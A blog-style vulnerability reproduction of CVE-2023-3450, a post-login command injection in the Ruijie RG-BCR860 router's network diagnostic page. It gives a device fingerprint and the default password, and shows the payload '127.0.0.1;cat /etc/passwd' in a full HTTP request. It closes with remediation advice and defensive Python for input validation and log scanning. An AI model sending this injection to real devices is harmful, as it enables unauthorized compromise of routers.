[Vulnerability reproduction] Ruijie RG-BCR860 back-end command execution vulnerability (CVE-2023-3450)


Foreword

Ruijie RG-BCR860 version 2.5.13 has an operating system command injection vulnerability, through which an attacker can obtain sensitive information from the device and fully compromise it.


Statement

Do not use the techniques in this article for illegal testing. Any direct or indirect consequences and losses caused by disseminating or using the information or tools provided in this article are borne by the user alone and have nothing to do with the author of the article. This article is for educational purposes only.

1. Introduction

Beijing Xingwang Ruijie Network Technology Co., Ltd. is an industry-leading provider of ICT infrastructure and industry solutions. Its main business is the R&D, design and sales of network equipment, network security products and cloud desktop solutions. The Ruijie Networks RG-BCR860 is a commercial cloud router from the company.


2. Vulnerability overview

Ruijie RG-BCR860 version 2.5.13 has an operating system command injection vulnerability. It is caused by a flaw in the Network Diagnostic Page component, whose input reaches an operating system command without adequate filtering.

Vulnerability number: CVE-2023-3450


3. Affected version

Ruijie RG-BCR860 version 2.5.13

4. Environment setup

The product is not open source, so a test environment cannot be built locally.

Fingerprint feature: icon_hash="-399311436"

5. Vulnerability reproduction

This is a back-end (post-authentication) vulnerability: you first need to log in to the management back end, which uses the default password admin.
The version shown is BCOS V2.5.10. Entering a command in the network diagnostic box and running it shows that the output of the executed command is echoed in the detection box. The value entered in the tracert address field was:
127.0.0.1;cat /etc/passwd
The request captured with Burp when the command is executed is as follows:

GET /cgi-bin/luci/;stok=7159************************c3/admin/diagnosis?diag=tracert&tracert_address=127.0.0.1%3Bcat+%2Fetc%2Fpasswd&seq=0 HTTP/1.1
Host: 127.0.0.1:6060
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1:6060/cgi-bin/luci/;stok=7159*******************************c3/admin/diagnosis
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
Cookie: sysauth=06a17629adb3bed0a6e95d9eeec0abe6
Connection: close


6. Remediation

The manufacturer has released an upgrade patch that fixes the vulnerability. The command injection arises because a normal diagnostic function filters its input too loosely; exploiting it requires logging in with a high-privilege account. It is recommended to change the login password to a strong password and to restrict access to the management interface with a source-address whitelist.
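As an added example (not part of the original post and not Ruijie's code), the following Python shows both defensive sides of this finding: how a diagnostic endpoint can validate the tracert target with an allow-list and invoke traceroute as an argv list instead of a shell string, and how a defender can scan access-log request lines for the /admin/diagnosis endpoint and flag targets that fail the same validation. The function names, the rule that every query parameter ending in "_address" is a target, and the sample log lines are assumptions constructed for this example; the flagged request mirrors the Burp capture above with the stok token replaced by a placeholder.

```python
from __future__ import annotations

import ipaddress
import re
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Hostname syntax (RFC 1123 labels): letters, digits and hyphens only, so no shell
# metacharacter, whitespace or leading '-' (option injection) can get through.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$"
)


def validate_target(target: str) -> str:
    """Accept an IPv4/IPv6 literal or a plain hostname; reject everything else.

    Allow-list validation is the standard fix for the kind of lax filtering
    described above: '127.0.0.1;cat /etc/passwd' is neither an IP nor a hostname.
    """
    try:
        return str(ipaddress.ip_address(target))
    except ValueError:
        pass
    if _HOSTNAME_RE.match(target):
        return target
    raise ValueError(f"rejected diagnostic target: {target!r}")


def build_tracert_argv(target: str) -> list[str]:
    """Hardened form of the diagnostic call (hypothetical, not Ruijie's code).

    The result is an argv list meant for subprocess.run(..., shell=False), so
    the target is always a single argument and is never parsed by /bin/sh.
    """
    return ["traceroute", "-n", validate_target(target)]


# Detection side: flag diagnosis requests whose target fails the same validation.
DIAGNOSIS_PATH_SUFFIX = "/admin/diagnosis"


def flag_diagnosis_request(request_line: str) -> Optional[dict]:
    """Return a finding for a suspicious diagnosis request line, else None.

    request_line is the 'METHOD path HTTP/x' line as written to an access log.
    Every query parameter ending in '_address' is checked (assumption: the post
    only shows tracert_address; other diagnostics are assumed to follow the pattern).
    """
    parts = request_line.split()
    if len(parts) < 2:
        return None
    url = urlsplit(parts[1])  # keeps the ';stok=...' segment inside the path
    if not url.path.endswith(DIAGNOSIS_PATH_SUFFIX):
        return None
    params = parse_qs(url.query, keep_blank_values=True)  # URL-decodes %3B and '+'
    for name, values in params.items():
        if not name.endswith("_address"):
            continue
        for value in values:
            try:
                validate_target(value)
            except ValueError as exc:
                return {
                    "diag": params.get("diag", ["?"])[0],
                    "param": name,
                    "value": value,
                    "reason": str(exc),
                }
    return None


def scan_access_log(lines: list[str]) -> list[dict]:
    """Run flag_diagnosis_request over request lines and collect the findings."""
    findings = []
    for line in lines:
        hit = flag_diagnosis_request(line)
        if hit is not None:
            findings.append(hit)
    return findings


# Constructed sample: the first line mirrors the Burp capture above (stok token
# replaced by a placeholder); the second is a benign traceroute to 8.8.8.8.
SAMPLE_REQUEST_LINES = [
    "GET /cgi-bin/luci/;stok=STOK_PLACEHOLDER/admin/diagnosis"
    "?diag=tracert&tracert_address=127.0.0.1%3Bcat+%2Fetc%2Fpasswd&seq=0 HTTP/1.1",
    "GET /cgi-bin/luci/;stok=STOK_PLACEHOLDER/admin/diagnosis"
    "?diag=tracert&tracert_address=8.8.8.8&seq=0 HTTP/1.1",
]

if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_REQUEST_LINES):
        print(finding)
```

The detector deliberately reuses the endpoint's own validator rather than a blacklist of metacharacters: anything that would not be a legal target for the hardened endpoint is worth a look in the logs, and the two checks cannot drift apart.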


Origin blog.csdn.net/weixin_46944519/article/details/132082131